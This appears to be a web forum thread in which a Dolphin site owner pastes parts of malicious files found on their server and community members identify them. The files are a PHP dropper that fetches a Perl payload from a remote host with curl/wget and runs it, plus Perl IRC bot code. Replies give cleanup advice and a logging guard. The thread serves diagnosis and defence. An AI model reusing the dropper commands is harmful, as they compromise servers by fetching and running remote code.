found txt files inside cache

I have discovered insiderz folder inside cache with 3 txt files namely "manado.txt", "rabot.txt" and "c.txt" i cpopied portion of the file

portion of manado:

<title>r@Crew</title>
<h2>PHPESSID546343569346834781478127128748375823758235782357823</h2><br><br>END OF BYPASS FILE<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<?
$url="http://adsforum168.com/cache/Insiderz/";
exec('cd /tmp;curl -O '.$url.'c.txt;perl c.txt;rm -f c.txt*;');
exec('cd /tmp;GET '.$url.'c.txt > c.txt;perl c.txt;rm -f c.txt*;');
exec('cd /tmp;wget '.$url.'c.txt;perl c.txt;rm -f c.txt*;');

portion of rabot:

# PIXEL ELITE RAQUERS POWER RANGERS BUBLEGUM
# desde 2001 ouvindo backstreet boys
#
#

my @nickname = ("Abdulrazak","Ackerman","Adams","Addison","Adelstein","Adibe","Adorno","Ahlers","Alavi","Alcorn","Alda","Yedidia");

my @realname  = ("Evils Coder");
my @WHO;

$ARGC=@ARGV;

if ($ARGC !=1) {
print "\n+ prendedor.pl v.1.7\n";
 print "+ by OneX\n";
 print "+ irc.racrew.us \#racrew\n";
  print "+ Usage: perl $0 (target)\n";
   print "+ Edit the source first!\n\n";
     exit(1);

portion of c.txt

#!/usr/bin/perl

use HTTP::Request;
use LWP::UserAgent;

my $processo = '[httpd]';
my $linas_max='4';
my $sleep='6';
my $cmd="[PHP-SHELL]";
my $id="http://www.liautism.com/components/efnet.txt?";
my @adms=("Insiderz","BYkER_BoYz","Rama","NuGeLo","AbanK","KaLeKeK","Anubias");
my @canais=("#Manado");
my @nickname = ("JokoL".int(rand(1000)));
my $nick = $nickname[rand scalar @nickname];

are these original dolphin folder? should I delete those?

I also found a folder named asdafg inside cache with a file inside that I cant open, its named something like YO' do I need to delete that too? my host provider said it looks lke a phishing folder "looks", thats why I want to confirm it first here in the community, I think you guys knows better than my host support team.

Just wondering what dolphin version you use? Where you host? And if you have added any additional security?

Also if all your file permissions have been checked and re-checked, as well as register globals off as boonex requires, some hosts do have them on.

Just trying to get a grasp for what and where you are at with this.

Certainly not originals. Almost looks like you got hit with a rfi. with the .txt extension you mention. Just compare anything in your directories to the original dolphin download. If they are suspeciuos back them up then do away with them. The file structure of dolphin is pretty obvious. But you never know. If you are new to dolphin, take a moment for some backups, security hardending, and rid them files.

the last two look like IRC bots, probably used for DDoS attacks or some such thing (unless you also have lots of large files somewhere on your server in which case they're probably IRC XDCC servers).

Do you/your host have any virus scanning software on your server? Most up to date AV's would find these type of bots I would imagine although I'm not 100% sure on that.

You could just join Efnet and join the channel #Manado, private message any of the adms (@adms=("Insiderz","BYkER_BoYz","Rama","NuGeLo","AbanK","KaLeKeK","Anubias")) as they are the people with access and ask them to stop. I doubt that they would do anything except laugh at you, but they would at least know that you 'found' their bot.

Oh, and definitely remove the files IMO, they're almost certainly not part of Dolphin..

Thanks it turned out I need to delete those folders and files,gave me a hard time deleting though, LOL

funny thng is before I figured out how to delete (you cant delete it using ftp) Phising Hackers attacked my site

change the permissions and re arranged and deleted block and menus. sigh*

Thanks Sammie, hope it will stop the badguys totally.

Yup, sad to find it out too late ,Im looking for a new secure host though...

A bit of a late addition to what sammie suggested. Try this at the top of your content.inc.php file:

if (isset($_REQUEST['sIncPath'])) {
error_log("HACKING ATTEMPT. User with the IP of ".$_SERVER["REMOTE_ADDR"]." has attempted to hack us using ".$_SERVER["SCRIPT_FILENAME"]);
die ('Hacking attempt');
}

This is going to properly log the attempt, which file was used and the IP of the attacker in apache's error_log file. Makes it easier to track him later.